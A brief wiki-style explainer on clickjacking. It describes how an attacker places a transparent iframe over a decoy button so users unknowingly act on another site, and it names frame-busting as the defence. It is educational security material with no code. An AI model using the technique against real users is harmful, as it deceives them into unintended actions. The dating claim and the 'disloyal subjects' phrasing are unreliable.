Security Click Jacking Introduction
// Security - Clickjacking:
Clickjacking is a way to trick the user into thinking he is clicking/typing on
one object while he is actually interacting with another. This can be done by
loading the target domain in an iframe on the malicious website. If the victim
domain frame is loaded with an opacity of zero, the user is not aware of the
presence of the iframe.
The user then ends up performing an action on the victim domain without even
realizing it.
The standard approach to solving this type of attack is to use frame-busting to
prevent your website from loading in a frame.
Clickjacking is a common web application vulnerability that hits its peak in the
early 2000s. This attack is used by malicious attacker to trick users into
thinking that they are interacting with one object while they are actually
interacting with another.
On a clickjacked page, the attacker displays some benign content to the user
while it loads another page on top in a transparent layer. On the clickjacked
page, the users think they are clicking buttons corresponding to the bottom
layer, while they are actually performing actions on the hidden page on top.
This is similar to other attacks in a way that the user does not have the
knowledge of what he is actually doing.
The attacker included an iframe on this page that references the contents of
the disloyal subjects. However, as a user do not see this form because the
attacker cleverly set the transparency of the iframe to 0, making it invisible.
Next, the attacker modified the CSS properties of the iframe to position it
directly on top of the button. When the user clicks on the button, the user
is actually interacting with the transparent iframe above it.
page revision: 0, last edited: 01 Jan 2017 22:25